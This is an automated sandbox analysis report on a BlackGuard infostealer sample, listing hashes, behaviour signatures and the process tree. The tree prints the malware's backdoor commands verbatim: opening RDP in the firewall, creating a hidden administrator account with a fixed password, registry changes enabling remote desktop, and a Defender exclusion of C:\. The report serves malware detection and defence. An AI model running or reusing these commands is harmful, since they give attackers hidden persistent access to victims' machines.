Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
21-01-2023 19:24
General
-
Target
file.exe
-
Size
6.9MB
-
MD5
146ffe4774086772bb8dc8af417d1bee
-
SHA1
a6ba1bfd326034d363f003def9600e4b3f8a3c99
-
SHA256
feb090fe2a018ba71f2db302a253998b66f9655a0d83f80db512604093aee9de
-
SHA512
332272905c5d85c226fcaa74ad60bf6bdd9544809b4dff4cedba42b42b8aa005c0cf7a9224a3c9070858a7311a640eedfeb1e5c19296b286e3ba5952584f99cb
-
SSDEEP
98304:5iyaKXumYgc4UC0td7fAYMQSlV4AnEjdGS1YVrsk9N8ivyhAdsPSQxNU3r:o5KmgfUCEvyVN8iNISeU7
Malware Config
Extracted
blackguard
https://ipwhois.app/xml/
Signatures
-
BlackGuard
Infostealer first seen in Late 2021.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Executes dropped EXE 3 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Modifies WinLogon 2 TTPs 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 58 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Users\Admin\AppData\Local\Temp\Inst.exe"C:\Users\Admin\AppData\Local\Temp\Inst.exe" x -pBlackTeam000111000111!2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\check.exe"C:\Users\Admin\AppData\Local\Temp\check.exe" -i3⤵
- Executes dropped EXE
- Sets DLL path for service in the registry
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow4⤵
- Modifies Windows Firewall
-
-
-
C:\Users\Admin\AppData\Local\Temp\check_update.exe"C:\Users\Admin\AppData\Local\Temp\check_update.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Upgrade.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\find.exeFind "="6⤵
-
-
C:\Windows\System32\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\net.exenet user xblackArgus xtrinity3301 /add /active:"yes" /expires:"never" /passwordchg:"NO"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user xblackArgus xtrinity3301 /add /active:"yes" /expires:"never" /passwordchg:"NO"6⤵
-
-
-
C:\Windows\system32\net.exenet localgroup Administrators xblackArgus /add5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators xblackArgus /add6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\find.exeFind "="6⤵
-
-
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" xblackArgus /add5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" xblackArgus /add6⤵
-
-
-
C:\Windows\system32\net.exenet accounts /forcelogoff:no /maxpwage:unlimited5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited6⤵
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v xblackArgus /t REG_DWORD /d 0x0 /f5⤵
-
-
C:\Windows\system32\attrib.exeattrib C:\users\xblackArgus +r +a +s +h5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command Add-MpPreference -ExclusionPath C:\5⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
Filesize
944KB
MD5748db7ac9ccf4c4e42061a815c1f51bc
SHA1bcec245408baf570812c6103867c808133f9a575
SHA256c103498f73546b5f802a9bd42c7d97819034cc854d619298338d160c6273cce8
SHA5121b051e5604482c04b073e933a36b6f8c41a50d15f079536959521fd3058e8d9ef1a5c613553509323dd65a2ce51bb72e639bf9beabd4cc0a1fa4fbfdeaf8ae2c
-
Filesize
944KB
MD5748db7ac9ccf4c4e42061a815c1f51bc
SHA1bcec245408baf570812c6103867c808133f9a575
SHA256c103498f73546b5f802a9bd42c7d97819034cc854d619298338d160c6273cce8
SHA5121b051e5604482c04b073e933a36b6f8c41a50d15f079536959521fd3058e8d9ef1a5c613553509323dd65a2ce51bb72e639bf9beabd4cc0a1fa4fbfdeaf8ae2c
-
Filesize
2KB
MD58281beda1f129589fd4e2e9b15885f4c
SHA1570fa137599993baf6e733a48eec21048c3c3e10
SHA256ac933c75e70d33b91e46f717d4437c8b1d4fd89990e2f6d271559756189741b7
SHA512363b28aa98ccec158201004e6653167cfe1ea703e4132b12456e725f62dcf9ddc450f39da18428628c405738c396135287433b5590cf8ca18830f6510a4fe20c
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
13KB
MD5d03fb817cf73c22ad37e47b1509ea519
SHA1865d238b7815a06542909a2eb57575d6f8d4bffc
SHA256efbd601add0c1704600c59595ba5f04a94202106a568b75a52b86af1b65ecac4
SHA512864d7762e55568bf4d846a1c4389406218d78cfb19ca9ed11f1330a4cbccd87eda3e7fa3bcdb754de50a5447e88f9eca36375b45a80cd9323369e023a2b74980
-
Filesize
13KB
MD5d03fb817cf73c22ad37e47b1509ea519
SHA1865d238b7815a06542909a2eb57575d6f8d4bffc
SHA256efbd601add0c1704600c59595ba5f04a94202106a568b75a52b86af1b65ecac4
SHA512864d7762e55568bf4d846a1c4389406218d78cfb19ca9ed11f1330a4cbccd87eda3e7fa3bcdb754de50a5447e88f9eca36375b45a80cd9323369e023a2b74980
-
Filesize
325KB
MD5978614ba750e0bede19be09885076cb1
SHA18ac61f5a3c37adff67c6a71a3adea5f4ddba0e63
SHA25639e76f6ab9fde606bbb277202e0af7cfe6e419a22936da7f3269969b8fb9dcd4
SHA512846ac9df5838f85a9cdc36edffb599144dd84e3ce0996a1471ca9ae10c88bbfe9de02b7b42664eb2559f3a87cf3263c87e0a6050f08150346cc5294c65d527bf
-
Filesize
1.7MB
MD556a504a34d2cfbfc7eaa2b68e34af8ad
SHA1426b48b0f3b691e3bb29f465aed9b936f29fc8cc
SHA2569309fb2a3f326d0f2cc3f2ab837cfd02e4f8cb6b923b3b2be265591fd38f4961
SHA512170c3645083d869e2368ee16325d7edaeba2d8f1d3d4a6a1054cfdd8616e03073772eeae30c8f79a93173825f83891e7b0e4fd89ef416808359f715a641747d7
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
Filesize
338KB
MD5f10fc43d60c6a5c2535c838b4e74f981
SHA1821f61300c5ece44c740d1b507737845b9896f43
SHA256cf95d896468d266e403b6ba60b299a78b7901f320a74b7103ef918bfc407c8fb
SHA5129f9a304a7af6ea1dc2806d162033c9649746a0f5345e2e807b3a10f86cb378ebe7580580a31ca5534504c19bef8cac851d171e5d037f80da4fa789f89271fcf9
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
1.8MB
-
Filesize
232KB
-
Filesize
6.9MB
-
Filesize
472KB